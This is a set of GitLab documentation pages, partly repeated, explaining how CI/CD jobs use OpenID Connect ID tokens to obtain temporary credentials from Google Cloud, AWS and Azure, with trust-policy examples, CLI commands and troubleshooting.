FEDERATED_TOKEN" \ --data '{"scope": ["https://www.googleapis.com/auth/cloud-platform"]}' \ | jq -r '.accessToken' )" ``` Where: - `SERVICE_ACCOUNT_EMAIL` is the full email address of the service account to impersonate, created in the previous section. - `FEDERATED_TOKEN` is the federated token retrieved from the previous step. The result is a Google Cloud OAuth 2.0 access token, which you can use to authenticate to most Google Cloud APIs and services when used as a bearer token. You can also pass this value to the `gcloud` CLI by setting the environment variable `CLOUDSDK_AUTH_ACCESS_TOKEN`. ## Working example Review this [reference project](https://gitlab.com/guided-explorations/gcp/configure-openid-connect-in-gcp) for provisioning OIDC in GCP using Terraform and a sample script to retrieve temporary credentials. ## Troubleshooting - When debugging `curl` responses, install the latest version of curl. Use `--fail-with-body` instead of `-f`. This command prints the entire body, which can contain helpful error messages. - For more information, see [Troubleshoot Workload Identity Federation](https://cloud.google.com/iam/docs/troubleshooting-workload-identity-federation).
https://docs.gitlab.com/ci/cloud_services/aws
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/cloud_services/_index.md
2025-08-13
doc/ci/cloud_services/aws
[ "doc", "ci", "cloud_services", "aws" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure OpenID Connect in AWS to retrieve temporary credentials
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} In this tutorial, we'll show you how to use a GitLab CI/CD job with a JSON web token (JWT) to retrieve temporary credentials from AWS without needing to store secrets. To do this, you must configure OpenID Connect (OIDC) for ID federation between GitLab and AWS. For background and requirements for integrating GitLab using OIDC, see [Connect to cloud services](../_index.md). To complete this tutorial: 1. [Add the identity provider](#add-the-identity-provider) 1. [Configure the role and trust](#configure-a-role-and-trust) 1. [Retrieve a temporary credential](#retrieve-temporary-credentials) ## Add the identity provider Create GitLab as a IAM OIDC provider in AWS following these [instructions](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_oidc.html). Include the following information: - **Provider URL**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. This address must be publicly accessible. If this is not publicly available, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance) - **Audience**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. - The address must include `https://`. - Do not include a trailing slash. ## Configure a role and trust After you create the identity provider, configure a [web identity role](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_oidc.html) with conditions for limiting access to GitLab resources. Temporary credentials are obtained using [AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html), so set the `Action` to [sts:AssumeRoleWithWebIdentity](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html). You can create a [custom trust policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-custom.html) for the role to limit authorization to a specific group, project, branch, or tag. For the full list of supported filtering types, see [Connect to cloud services](../_index.md#configure-a-conditional-role-with-oidc-claims). ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::AWS_ACCOUNT:oidc-provider/gitlab.example.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "gitlab.example.com:sub": "project_path:mygroup/myproject:ref_type:branch:ref:main" } } } ] } ``` After the role is created, attach a policy defining permissions to an AWS service (S3, EC2, Secrets Manager). ## Retrieve temporary credentials After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from [AWS Security Token Service (STS)](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html). ```yaml assume role: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com script: # this is split out for correct exit code handling - > aws_sts_output=$(aws sts assume-role-with-web-identity --role-arn ${ROLE_ARN} --role-session-name "GitLabRunner-${CI_PROJECT_ID}-${CI_PIPELINE_ID}" --web-identity-token ${GITLAB_OIDC_TOKEN} --duration-seconds 3600 --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text) - export $(printf "AWS_ACCESS_KEY_ID=%s AWS_SECRET_ACCESS_KEY=%s AWS_SESSION_TOKEN=%s" $aws_sts_output) - aws sts get-caller-identity ``` - `ROLE_ARN`: The role ARN defined in this [step](#configure-a-role-and-trust). - `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens). ## Working examples - See this [reference project](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws) for provisioning OIDC in AWS using Terraform and a sample script to retrieve temporary credentials. - [OIDC and Multi-Account Deployment with GitLab and ECS](https://gitlab.com/guided-explorations/aws/oidc-and-multi-account-deployment-with-ecs). - AWS Partner (APN) Blog: [Setting up OpenID Connect with GitLab CI/CD](https://aws.amazon.com/blogs/apn/setting-up-openid-connect-with-gitlab-ci-cd-to-provide-secure-access-to-environments-in-aws-accounts/). - [GitLab at AWS re:Inforce 2023: Secure GitLab CD pipelines to AWS w/ OpenID and JWT](https://www.youtube.com/watch?v=xWQGADDVn8g). ## Configure a non-public GitLab instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391928) in GitLab 18.1 {{< /history >}} {{< alert type="warning" >}} This workaround is an advanced configuration option with security considerations to understand. You must be careful to correctly sync the OpenID configuration and the public keys from your private GitLab Self-Managed instance to a publicly available location such as an S3 bucket. You must also ensure that the S3 bucket and files inside are properly secured. Failing to properly secure the S3 bucket could lead to the takeover of any cloud accounts associated with this OpenID Connect identity. {{< /alert >}} If your GitLab instance is not publicly accessible, configuring OpenID Connect in AWS is not possible by default. You can use a workaround to make some specific configuration publicly accessible, enabling OpenID Connect configuration for the instance: 1. Store authentication details for your GitLab instance at a publicly available location, for example in S3 files: - Host the OpenID configuration for your instance in an S3 file. The configuration is available at `/.well-known/openid-configuration`, like `http://gitlab.example.com/.well-known/openid-configuration`. Update the `issuer:` and `jwks_uri:` values in the configuration file to point to the publicly available locations. - Host the public keys for your instance URL in an S3 file. The keys are available at available at `/oauth/discovery/keys`, like `http://gitlab.example.com/oauth/discovery/keys`. For example: - OpenID configuration file: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/.well-known/openid-configuration`. - JWKS (JSON Web Key Sets): `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/oauth/discovery/keys`. - The issuer claim `iss:` in the ID Tokens and the `issuer:` value in the OpenID configuration would be: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com` 1. Optional. Use an OpenID configuration validator like the [OpenID Configuration Endpoint Validator](https://www.oauth2.dev/tools/openid-configuration-validator) to validate your publicly available OpenID configuration. 1. Configure a custom issuer claim for your ID tokens. By default, GitLab ID tokens have the issuer claim `iss:` set as the address of your GitLab instance, for example: `http://gitlab.example.com`. 1. Update the issuer URL: {{< tabs >}} {{< tab title="Linux package (Omnibus)" >}} 1. Edit `/etc/gitlab/gitlab.rb`: ```ruby gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#reconfigure-a-linux-package-installation) for the changes to take effect. {{< /tab >}} {{< tab title="Helm chart (Kubernetes)" >}} 1. Export the Helm values: ```shell helm get values gitlab > gitlab_values.yaml ``` 1. Edit `gitlab_values.yaml`: ```yaml global: appConfig: ciIdTokens: issuerUrl: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and apply the new values: ```shell helm upgrade -f gitlab_values.yaml gitlab gitlab/gitlab ``` {{< /tab >}} {{< tab title="Docker" >}} 1. Edit `docker-compose.yml`: ```yaml version: "3.6" services: gitlab: environment: GITLAB_OMNIBUS_CONFIG: | gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and restart GitLab: ```shell docker compose up -d ``` {{< /tab >}} {{< tab title="Self-compiled (source)" >}} 1. Edit `/home/git/gitlab/config/gitlab.yml`: ```yaml production: &base ci_id_tokens: issuer_url: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#self-compiled-installations) for the changes to take effect. {{< /tab >}} {{< /tabs >}} 1. Run the [`ci:validate_id_token_configuration` Rake task](../../../administration/raketasks/tokens/_index.md#validate-custom-issuer-url-configuration-for-cicd-id-tokens) to validate the CI/CD ID token configuration. ## Troubleshooting ### Error: `Not authorized to perform sts:AssumeRoleWithWebIdentity` If you see this error: ```plaintext An error occurred (AccessDenied) when calling the AssumeRoleWithWebIdentity operation: Not authorized to perform sts:AssumeRoleWithWebIdentity ``` It can occur for multiple reasons: - The cloud administrator has not configured the project to use OIDC with GitLab. - The role is restricted from being run on the branch or tag. See [configure a conditional role](../_index.md). - `StringEquals` is used instead of `StringLike` when using a wildcard condition. See [related issue](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws/-/issues/2#note_852901934). ### `Could not connect to openid configuration of provider` error After adding the Identity Provider in AWS IAM, you might get the following error: ```plaintext Your request has a problem. Please see the following details. - Could not connect to openid configuration of provider: `https://gitlab.example.com` ``` This error occurs when the OIDC identity provider's issuer presents a certificate chain that's out of order, or includes duplicate or additional certificates. Verify your GitLab instance's certificate chain. The chain must start with the domain or issuer URL, then the intermediate certificate, and end with the root certificate. Use this command to review the certificate chain, replacing `gitlab.example.com` with your GitLab hostname: ```shell echo | /opt/gitlab/embedded/bin/openssl s_client -connect gitlab.example.com:443 ``` ### `Couldn't retrieve verification key from your identity provider` error You might receive an error similar to: - `An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: Couldn't retrieve verification key from your identity provider, please reference AssumeRoleWithWebIdentity documentation for requirements` This error might be because: - The `.well_known` URL and `jwks_uri` of the identity provider (IdP) are inaccessible from the public internet. - A custom firewall is blocking the requests. - There's latency of more than 5 seconds in API requests from the IdP to reach the AWS STS endpoint. - STS is making too many requests to your `.well_known` URL or the `jwks_uri` of the IdP. As documented in the [AWS Knowledge Center article for this error](https://repost.aws/knowledge-center/iam-sts-invalididentitytoken), your GitLab instance needs to be publicly accessible so that the `.well_known` URL and `jwks_uri` can be resolved. If this is not possible, for example if your GitLab instance is in an offline environment, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance)
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Configure OpenID Connect in AWS to retrieve temporary credentials breadcrumbs: - doc - ci - cloud_services - aws --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} In this tutorial, we'll show you how to use a GitLab CI/CD job with a JSON web token (JWT) to retrieve temporary credentials from AWS without needing to store secrets. To do this, you must configure OpenID Connect (OIDC) for ID federation between GitLab and AWS. For background and requirements for integrating GitLab using OIDC, see [Connect to cloud services](../_index.md). To complete this tutorial: 1. [Add the identity provider](#add-the-identity-provider) 1. [Configure the role and trust](#configure-a-role-and-trust) 1. [Retrieve a temporary credential](#retrieve-temporary-credentials) ## Add the identity provider Create GitLab as a IAM OIDC provider in AWS following these [instructions](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_oidc.html). Include the following information: - **Provider URL**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. This address must be publicly accessible. If this is not publicly available, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance) - **Audience**: The address of your GitLab instance, such as `https://gitlab.com` or `http://gitlab.example.com`. - The address must include `https://`. - Do not include a trailing slash. ## Configure a role and trust After you create the identity provider, configure a [web identity role](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_oidc.html) with conditions for limiting access to GitLab resources. Temporary credentials are obtained using [AWS Security Token Service](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html), so set the `Action` to [sts:AssumeRoleWithWebIdentity](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html). You can create a [custom trust policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-custom.html) for the role to limit authorization to a specific group, project, branch, or tag. For the full list of supported filtering types, see [Connect to cloud services](../_index.md#configure-a-conditional-role-with-oidc-claims). ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::AWS_ACCOUNT:oidc-provider/gitlab.example.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "gitlab.example.com:sub": "project_path:mygroup/myproject:ref_type:branch:ref:main" } } } ] } ``` After the role is created, attach a policy defining permissions to an AWS service (S3, EC2, Secrets Manager). ## Retrieve temporary credentials After you configure the OIDC and role, the GitLab CI/CD job can retrieve a temporary credential from [AWS Security Token Service (STS)](https://docs.aws.amazon.com/STS/latest/APIReference/welcome.html). ```yaml assume role: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.example.com script: # this is split out for correct exit code handling - > aws_sts_output=$(aws sts assume-role-with-web-identity --role-arn ${ROLE_ARN} --role-session-name "GitLabRunner-${CI_PROJECT_ID}-${CI_PIPELINE_ID}" --web-identity-token ${GITLAB_OIDC_TOKEN} --duration-seconds 3600 --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text) - export $(printf "AWS_ACCESS_KEY_ID=%s AWS_SECRET_ACCESS_KEY=%s AWS_SESSION_TOKEN=%s" $aws_sts_output) - aws sts get-caller-identity ``` - `ROLE_ARN`: The role ARN defined in this [step](#configure-a-role-and-trust). - `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens). ## Working examples - See this [reference project](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws) for provisioning OIDC in AWS using Terraform and a sample script to retrieve temporary credentials. - [OIDC and Multi-Account Deployment with GitLab and ECS](https://gitlab.com/guided-explorations/aws/oidc-and-multi-account-deployment-with-ecs). - AWS Partner (APN) Blog: [Setting up OpenID Connect with GitLab CI/CD](https://aws.amazon.com/blogs/apn/setting-up-openid-connect-with-gitlab-ci-cd-to-provide-secure-access-to-environments-in-aws-accounts/). - [GitLab at AWS re:Inforce 2023: Secure GitLab CD pipelines to AWS w/ OpenID and JWT](https://www.youtube.com/watch?v=xWQGADDVn8g). ## Configure a non-public GitLab instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391928) in GitLab 18.1 {{< /history >}} {{< alert type="warning" >}} This workaround is an advanced configuration option with security considerations to understand. You must be careful to correctly sync the OpenID configuration and the public keys from your private GitLab Self-Managed instance to a publicly available location such as an S3 bucket. You must also ensure that the S3 bucket and files inside are properly secured. Failing to properly secure the S3 bucket could lead to the takeover of any cloud accounts associated with this OpenID Connect identity. {{< /alert >}} If your GitLab instance is not publicly accessible, configuring OpenID Connect in AWS is not possible by default. You can use a workaround to make some specific configuration publicly accessible, enabling OpenID Connect configuration for the instance: 1. Store authentication details for your GitLab instance at a publicly available location, for example in S3 files: - Host the OpenID configuration for your instance in an S3 file. The configuration is available at `/.well-known/openid-configuration`, like `http://gitlab.example.com/.well-known/openid-configuration`. Update the `issuer:` and `jwks_uri:` values in the configuration file to point to the publicly available locations. - Host the public keys for your instance URL in an S3 file. The keys are available at available at `/oauth/discovery/keys`, like `http://gitlab.example.com/oauth/discovery/keys`. For example: - OpenID configuration file: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/.well-known/openid-configuration`. - JWKS (JSON Web Key Sets): `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com/oauth/discovery/keys`. - The issuer claim `iss:` in the ID Tokens and the `issuer:` value in the OpenID configuration would be: `https://example-oidc-configuration-s3-bucket.s3.eu-north-1.amazonaws.com` 1. Optional. Use an OpenID configuration validator like the [OpenID Configuration Endpoint Validator](https://www.oauth2.dev/tools/openid-configuration-validator) to validate your publicly available OpenID configuration. 1. Configure a custom issuer claim for your ID tokens. By default, GitLab ID tokens have the issuer claim `iss:` set as the address of your GitLab instance, for example: `http://gitlab.example.com`. 1. Update the issuer URL: {{< tabs >}} {{< tab title="Linux package (Omnibus)" >}} 1. Edit `/etc/gitlab/gitlab.rb`: ```ruby gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#reconfigure-a-linux-package-installation) for the changes to take effect. {{< /tab >}} {{< tab title="Helm chart (Kubernetes)" >}} 1. Export the Helm values: ```shell helm get values gitlab > gitlab_values.yaml ``` 1. Edit `gitlab_values.yaml`: ```yaml global: appConfig: ciIdTokens: issuerUrl: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and apply the new values: ```shell helm upgrade -f gitlab_values.yaml gitlab gitlab/gitlab ``` {{< /tab >}} {{< tab title="Docker" >}} 1. Edit `docker-compose.yml`: ```yaml version: "3.6" services: gitlab: environment: GITLAB_OMNIBUS_CONFIG: | gitlab_rails['ci_id_tokens_issuer_url'] = 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and restart GitLab: ```shell docker compose up -d ``` {{< /tab >}} {{< tab title="Self-compiled (source)" >}} 1. Edit `/home/git/gitlab/config/gitlab.yml`: ```yaml production: &base ci_id_tokens: issuer_url: 'public_url_with_openid_configuration_and_keys' ``` 1. Save the file and [reconfigure GitLab](../../../administration/restart_gitlab.md#self-compiled-installations) for the changes to take effect. {{< /tab >}} {{< /tabs >}} 1. Run the [`ci:validate_id_token_configuration` Rake task](../../../administration/raketasks/tokens/_index.md#validate-custom-issuer-url-configuration-for-cicd-id-tokens) to validate the CI/CD ID token configuration. ## Troubleshooting ### Error: `Not authorized to perform sts:AssumeRoleWithWebIdentity` If you see this error: ```plaintext An error occurred (AccessDenied) when calling the AssumeRoleWithWebIdentity operation: Not authorized to perform sts:AssumeRoleWithWebIdentity ``` It can occur for multiple reasons: - The cloud administrator has not configured the project to use OIDC with GitLab. - The role is restricted from being run on the branch or tag. See [configure a conditional role](../_index.md). - `StringEquals` is used instead of `StringLike` when using a wildcard condition. See [related issue](https://gitlab.com/guided-explorations/aws/configure-openid-connect-in-aws/-/issues/2#note_852901934). ### `Could not connect to openid configuration of provider` error After adding the Identity Provider in AWS IAM, you might get the following error: ```plaintext Your request has a problem. Please see the following details. - Could not connect to openid configuration of provider: `https://gitlab.example.com` ``` This error occurs when the OIDC identity provider's issuer presents a certificate chain that's out of order, or includes duplicate or additional certificates. Verify your GitLab instance's certificate chain. The chain must start with the domain or issuer URL, then the intermediate certificate, and end with the root certificate. Use this command to review the certificate chain, replacing `gitlab.example.com` with your GitLab hostname: ```shell echo | /opt/gitlab/embedded/bin/openssl s_client -connect gitlab.example.com:443 ``` ### `Couldn't retrieve verification key from your identity provider` error You might receive an error similar to: - `An error occurred (InvalidIdentityToken) when calling the AssumeRoleWithWebIdentity operation: Couldn't retrieve verification key from your identity provider, please reference AssumeRoleWithWebIdentity documentation for requirements` This error might be because: - The `.well_known` URL and `jwks_uri` of the identity provider (IdP) are inaccessible from the public internet. - A custom firewall is blocking the requests. - There's latency of more than 5 seconds in API requests from the IdP to reach the AWS STS endpoint. - STS is making too many requests to your `.well_known` URL or the `jwks_uri` of the IdP. As documented in the [AWS Knowledge Center article for this error](https://repost.aws/knowledge-center/iam-sts-invalididentitytoken), your GitLab instance needs to be publicly accessible so that the `.well_known` URL and `jwks_uri` can be resolved. If this is not possible, for example if your GitLab instance is in an offline environment, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance)
https://docs.gitlab.com/ci/cloud_services/azure
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/cloud_services/_index.md
2025-08-13
doc/ci/cloud_services/azure
[ "doc", "ci", "cloud_services", "azure" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure OpenID Connect in Azure to retrieve temporary credentials
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates how to use a JSON web token (JWT) in a GitLab CI/CD job to retrieve temporary credentials from Azure without needing to store secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Azure. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). Prerequisites: - Access to an existing Azure Subscription with `Owner` access level. - Access to the corresponding Azure Active Directory Tenant with at least the `Application Developer` access level. - A local installation of the [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli). Alternatively, you can use all the following steps with the [Azure Cloud Shell](https://portal.azure.com/#cloudshell/). - Your GitLab instance must be publicly accessible over the internet as Azure must to connect to the GitLab OIDC endpoint. - A GitLab project. To complete this tutorial: 1. [Create Azure AD application and service principal](#create-azure-ad-application-and-service-principal). 1. [Create Azure AD federated identity credentials](#create-azure-ad-federated-identity-credentials). 1. [Grant permissions for the service principal](#grant-permissions-for-the-service-principal). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). For more information about Azure identity federation, see [workload identity federation](https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation). ## Create Azure AD application and service principal To create an [Azure AD application](https://learn.microsoft.com/en-us/cli/azure/ad/app?view=azure-cli-latest#az-ad-app-create) and service principal: 1. In the Azure CLI, create the AD application: ```shell appId=$(az ad app create --display-name gitlab-oidc --query appId -otsv) ``` Save the `appId` (Application client ID) output, as you need it later to configure your GitLab CI/CD pipeline. 1. Create a corresponding [Service Principal](https://learn.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az-ad-sp-create): ```shell az ad sp create --id $appId --query appId -otsv ``` Instead of the Azure CLI, you can [use the Azure Portal to create these resources](https://learn.microsoft.com/en-us/entra/identity-platform/howto-create-service-principal-portal). ## Create Azure AD federated identity credentials To create the federated identity credentials for the previous Azure AD application for a specific branch in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": "project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>", "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` For issues related to the values of `issuer`, `subject` or `audiences`, see the [troubleshooting](#troubleshooting) details. Optionally, you can now verify the Azure AD application and the Azure AD federated identity credentials from the Azure Portal: 1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps) view and select the appropriate app registration by searching for the display name `gitlab-oidc`. 1. On the overview page you can verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`. 1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials. ### Create credentials for any branch or any tag To create credentials for any branch or tag (wildcard matching), you can use [flexible federated identity credentials](https://learn.microsoft.com/entra/workload-id/workload-identities-flexible-federated-identity-credentials). For all branches in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": null, "claimsMatchingExpression": { "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:branch:ref:*'", "languageVersion": 1 }, "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` For all tags in `<mygroup>/<myproject>`: ```shell objectId=$(az ad app show --id $appId --query id -otsv) cat <<EOF > body.json { "name": "gitlab-federated-identity", "issuer": "https://gitlab.example.com", "subject": null, "claimsMatchingExpression": { "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:tag:ref:*'", "languageVersion": 1 }, "description": "GitLab service account federated identity", "audiences": [ "https://gitlab.example.com" ] } EOF az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json ``` ## Grant permissions for the service principal After you create the credentials, use [`role assignment`](https://learn.microsoft.com/en-us/cli/azure/role/assignment?view=azure-cli-latest#az-role-assignment-create) to grant permissions to the previous service principal so it gets access to the Azure resources: ```shell az role assignment create --assignee $appId --role Reader --scope /subscriptions/<subscription-id> ``` You can find your subscription ID in: - The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription). - The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription). The previous command grants read-only permissions to the entire subscription. For more information on applying the principle of least privilege in the context of your organization, read [Best practices for Azure AD roles](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices). ## Retrieve a temporary credential After you configure the Azure AD application and federated identity credentials, the CI/CD job can retrieve a temporary credential by using the [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login): ```yaml default: image: mcr.microsoft.com/azure-cli:latest variables: AZURE_CLIENT_ID: "<client-id>" AZURE_TENANT_ID: "<tenant-id>" auth: id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.com script: - az login --service-principal -u $AZURE_CLIENT_ID -t $AZURE_TENANT_ID --federated-token $GITLAB_OIDC_TOKEN - az account show ``` The CI/CD variables are: - `AZURE_CLIENT_ID`: The [application client ID you saved earlier](#create-azure-ad-application-and-service-principal). - `AZURE_TENANT_ID`: Your Azure Active Directory. You can [find it by using the Azure CLI or Azure Portal](https://learn.microsoft.com/en-us/entra/fundamentals/how-to-find-tenant). - `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens). ## Troubleshooting ### "No matching federated identity record found" If you receive the error `ERROR: AADSTS70021: No matching federated identity record found for presented assertion.` you should verify: - The `Issuer` defined in the Azure AD federated identity credentials, for example `https://gitlab.com` or your own GitLab URL. - The `Subject identifier` defined in the Azure AD federated identity credentials, for example `project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>`. - For the `gitlab-group/gitlab-project` project and `main` branch it would be: `project_path:gitlab-group/gitlab-project:ref_type:branch:ref:main`. - The correct values of `mygroup` and `myproject` can be retrieved by checking the URL when accessing your GitLab project or, in the upper-right corner of the project's overview page, selecting **Code**. - The `Audience` defined in the Azure AD federated identity credentials, for example `https://gitlab.com` or your own GitLab URL. You can review these settings, as well as your `AZURE_CLIENT_ID` and `AZURE_TENANT_ID` CI/CD variables, from the Azure Portal: 1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps) view and select the appropriate app registration by searching for the display name `gitlab-oidc`. 1. On the overview page you can verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`. 1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials. Review [Connect to cloud services](../_index.md) for further details. ### `Request to External OIDC endpoint failed` message If you receive the error `ERROR: AADSTS501661: Request to External OIDC endpoint failed.` you should verify that your GitLab instance is publicly accessible from the internet. Azure must be able to access the following GitLab endpoints to authenticate with OIDC: - `GET /.well-known/openid-configuration` - `GET /oauth/discovery/keys` If you update your firewall and still receive this error, [clear the Redis cache](../../../administration/raketasks/maintenance.md#clear-redis-cache) and try again. ### `No matching federated identity record found for presented assertion audience` message If you receive the error `ERROR: AADSTS700212: No matching federated identity record found for presented assertion audience 'https://gitlab.com'` you should verify that your CI/CD job uses the correct `aud` value. The `aud` value should match the audience used to [create the federated identity credentials](#create-azure-ad-federated-identity-credentials).
